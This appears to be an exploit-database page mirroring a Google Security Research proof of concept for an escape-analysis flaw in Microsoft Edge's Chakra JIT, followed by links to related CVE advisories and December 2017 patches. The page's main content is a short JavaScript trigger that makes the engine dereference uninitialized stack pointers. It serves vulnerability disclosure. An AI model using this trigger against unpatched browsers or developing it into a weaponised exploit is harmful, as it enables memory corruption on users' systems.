Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtGoogle Security Research1337DAY-ID-29410
HistoryJan 09, 2018 - 12:00 a.m.

Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit

2018-01-0900:00:00
Google Security Research
0day.today
23

0.949 High

EPSS

Percentile

99.1%

JSON

Exploit for windows platform in category dos / poc

/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
 
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
 
PoC:
*/
 
function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}
 
function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }
 
    print(opt());  // deref uninitialized stack pointers!
}
 
main();

#  0day.today [2018-03-01]  #

Related

symantec 1
mscve 1
packetstorm 1
veracode 14
prion 19
osv 22
github 9
cve 19
mskb 5
nessus 5
openvas 5
kaspersky 1
talosblog 1
trendmicroblog 1
symantec
symantec
Microsoft Edge Scripting Engine CVE-2017-11918 Remote Memory Corruption Vulnerability
2017-12-12 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2017-12-12 08:00:00
packetstorm
packetstorm
Microsoft Edge Chakra JIT Escape Analysis Bug
2018-01-10 00:00:00
veracode
veracode
Privilege Escalation
2018-07-05 05:13:18
Remote Code Execution (RCE)
2018-07-05 02:45:16
Remote Code Execution (RCE)
2018-07-05 03:39:12
prion
prion
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
osv
osv
CVE-2017-11893
2017-12-12 21:29:01
CVE-2017-11910
2017-12-12 21:29:01
ChakraCore RCE Vulnerability
2022-05-14 04:03:59
github
github
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:51
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:50
ChakraCore RCE Vulnerability
2022-05-17 00:11:58
cve
cve
CVE-2017-11908
2017-12-12 21:29:00
CVE-2017-11894
2017-12-12 21:29:00
CVE-2017-11903
2017-12-12 21:29:00
mskb
mskb
December 12, 2017—KB4053581 (OS Build 10240.17709)
2017-12-12 08:00:00
December 12, 2017—KB4053579 (OS Build 14393.1944)
2017-12-12 08:00:00
December 12, 2017—KB4053580 (OS Build 15063.786)
2017-12-12 08:00:00
nessus
nessus
KB4053581: Windows 10 December 2017 Security Update
2017-12-12 00:00:00
KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update
2017-12-12 00:00:00
KB4053578: Windows 10 Version 1511 December 2017 Security Update
2017-12-12 00:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4053581)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053580)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053579)
2017-12-13 00:00:00
kaspersky
kaspersky
KLA11158 Multiple vunlerabilities in Microsoft Browsers
2017-12-12 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - December 2017
2017-12-12 15:32:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of December 11, 2017
2017-12-15 16:06:45

0.949 High

EPSS

Percentile

99.1%

JSON
Related for 1337DAY-ID-29410
symantec1mscve1packetstorm1veracode14prion19osv22github9cve19mskb5nessus5openvas5kaspersky1talosblog1trendmicroblog1